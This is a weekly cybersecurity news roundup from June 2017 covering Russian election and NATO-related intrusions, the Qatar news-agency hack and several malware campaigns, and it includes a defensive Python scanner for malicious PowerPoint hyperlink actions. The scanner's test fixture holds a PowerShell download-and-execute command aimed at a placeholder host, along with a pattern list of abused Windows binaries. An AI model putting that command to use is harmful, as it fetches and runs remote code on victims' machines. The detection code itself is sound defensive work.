Cyber security weekly summary 5 - 11 June

The week under review brought mainly new cases of alleged Russian cyber attacks and several new malware campaigns.

Perhaps the most important event of the week is the publication of an internal NSA report documenting Russian cyber activity against the U.S. presidential election. According to the document, dated May 5, 2017, hackers from the Russian military intelligence service GRU penetrated the systems of a supplier of hardware and software used in the U.S. presidential election. Data obtained through that intrusion were subsequently used in a phishing campaign against local government organizations. The report does not state to what extent the attacks were successful, nor whether they influenced the election.

In connection with the case, authorities have arrested NSA contractor Reality Leigh Winner, who has been identified as the source of the leak.

On June 6 the security company FireEye presented new information on cyber attacks against the Montenegrin government carried out during 2017. The researchers assess that the spear-phishing campaign is the work of the Russian group APT28, which is believed to be connected to the Russian intelligence services. The attribution rests on the presence of a specific malware family that is a hallmark of that group, and on the fact that the same infrastructure was used in previous campaigns against NATO members. According to the experts, the attacks were related to Montenegro's planned accession to NATO, which was completed on June 5.

Aside from the Montenegrin case, Russian hackers are also blamed for the compromise of the website of Qatar's official news agency, to which a fabricated story about the country's good relations with Iran, Israel, and the U.S. was subsequently added. The act, attributed to the Russian Federation by an FBI team assisting the local authorities with the investigation, is regarded as one of the contributing factors in the subsequent diplomatic clash between Qatar and neighbouring countries led by Saudi Arabia and the United Arab Emirates.

Researchers at the security firm SentinelOne have discovered a new technique for spreading the banking trojan Zusy (also known as Tinba) via attached PowerPoint files. Unlike most Microsoft Office-based infections, the delivery does not rely on macros. Instead, a hyperlink action in the document (triggered when the user hovers the mouse over the link) attempts to launch PowerShell code that downloads the trojan. Because no macro is involved, macro-blocking policies do not stop it; the document still has to get past Office's Protected View and the "run program" security prompt.
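To turn the delivery technique described above into a check, the following added example (not SentinelOne's or the author's code) scans a .pptx for hyperlink and mouse-over actions whose target runs a program or contains a PowerShell (or similar) command line. It assumes only the standard OOXML layout: a .pptx is a ZIP archive, the slide XML references each hyperlink target by relationship ID, and that ID is resolved in the slide's own .rels part. The two sample archives are constructed inside the block with only the parts the scanner reads, and the command line in the malicious sample is a placeholder, not a real payload.

```python
"""Scan .pptx archives for hyperlink / mouse-over actions that launch programs.

Added example for this summary; not code from SentinelOne or the page's author.
Assumed (standard OOXML) layout:
  ppt/slides/slideN.xml             -> <a:hlinkClick> / <a:hlinkMouseOver r:id="..." action="..."/>
  ppt/slides/_rels/slideN.xml.rels  -> <Relationship Id="..." Target="..." TargetMode="External"/>
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import unquote
from xml.sax.saxutils import quoteattr

NS_A = "http://schemas.openxmlformats.org/drawingml/2006/main"
NS_P = "http://schemas.openxmlformats.org/presentationml/2006/main"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_REL = "http://schemas.openxmlformats.org/package/2006/relationships"

# Interpreters / LOLBins a hyperlink target should never name.
SUSPICIOUS = re.compile(r"powershell|pwsh|cmd(\.exe)?\b|mshta|wscript|cscript|rundll32|certutil", re.I)


def scan_pptx(data: bytes) -> list:
    """Return one finding per hyperlink action that runs a program or names a suspicious binary."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        slides = sorted(n for n in names if re.fullmatch(r"ppt/slides/slide\d+\.xml", n))
        for slide in slides:
            # Resolve relationship IDs -> (target, target mode) from the slide's .rels part.
            rels_name = slide.replace("ppt/slides/", "ppt/slides/_rels/") + ".rels"
            targets = {}
            if rels_name in names:
                for rel in ET.fromstring(z.read(rels_name)).findall(f"{{{NS_REL}}}Relationship"):
                    targets[rel.get("Id")] = (rel.get("Target", ""), rel.get("TargetMode", ""))
            root = ET.fromstring(z.read(slide))
            for tag in ("hlinkClick", "hlinkMouseOver"):
                for el in root.iter(f"{{{NS_A}}}{tag}"):
                    action = el.get("action", "")
                    raw_target, mode = targets.get(el.get(f"{{{NS_R}}}id"), ("", ""))
                    target = unquote(raw_target)  # targets are stored URL-encoded
                    if action.startswith("ppaction://program") or SUSPICIOUS.search(target):
                        findings.append({
                            "slide": slide, "trigger": tag, "action": action,
                            "target": target, "external": mode == "External",
                        })
    return findings


def build_sample_pptx(link_tag: str, action: str, target: str) -> bytes:
    """Constructed minimal .pptx with only the parts the scanner reads (not a real document)."""
    action_attr = f' action="{action}"' if action else ""
    slide = f"""<?xml version="1.0" encoding="UTF-8"?>
<p:sld xmlns:a="{NS_A}" xmlns:p="{NS_P}" xmlns:r="{NS_R}">
  <p:cSld><p:spTree><p:sp><p:txBody><a:p><a:r>
    <a:rPr lang="en-US"><a:{link_tag} r:id="rId2"{action_attr}/></a:rPr>
    <a:t>Loading... Please wait</a:t>
  </a:r></a:p></p:txBody></p:sp></p:spTree></p:cSld>
</p:sld>"""
    rels = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{NS_REL}">
  <Relationship Id="rId1" Type="{NS_R}/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="{NS_R}/hyperlink" Target={quoteattr(target)} TargetMode="External"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("ppt/slides/slide1.xml", slide)
        z.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


# Constructed samples: a benign web link and a mouse-over "run program" action
# whose target is a placeholder PowerShell download cradle (example.invalid never resolves).
BENIGN_PPTX = build_sample_pptx("hlinkClick", "", "https://example.com/")
MALICIOUS_PPTX = build_sample_pptx(
    "hlinkMouseOver", "ppaction://program",
    "powershell%20-NoP%20-NonI%20-W%20Hidden%20-Exec%20Bypass%20"
    "%22IEX%20(New-Object%20Net.WebClient).DownloadString('http://example.invalid/p.ps1')%22",
)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_PPTX), ("malicious", MALICIOUS_PPTX)):
        for f in scan_pptx(blob) or [None]:
            print(label, "->", f if f else "no program-launching hyperlink actions")
```

For a real file, call `scan_pptx(open(path, "rb").read())`; .ppsx and .ppsm share the same slide layout, and a finding with `external` set and a decoded target that is a command line rather than a URL is the signature to alert on. The scanner deliberately flags any `ppaction://program` action even when the target looks harmless, because "run program" hyperlinks have no place in mail attachments.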

Specialists from the Chinese firm Qihoo 360 described malware, referred to as WannaLocker, that targets Chinese Android users. The ransomware imitates the infamous WannaCry but uses a more advanced encryption scheme, applied to selected files only. Instead of Bitcoin or a similar cryptocurrency, its authors demand payment in conventional currency, which is rather uncommon, as such transfers are easier to trace.

Android users were also targeted by new malware hidden in an application named Colorblok. The application, discovered by Kaspersky Lab, contains a unique trojan. The malware, dubbed DVmap, supports the 64-bit version of Android. The tool, which is apparently still in a testing phase, not only installs its own modules but is also able to modify system libraries.

About the author: Roman Šulc

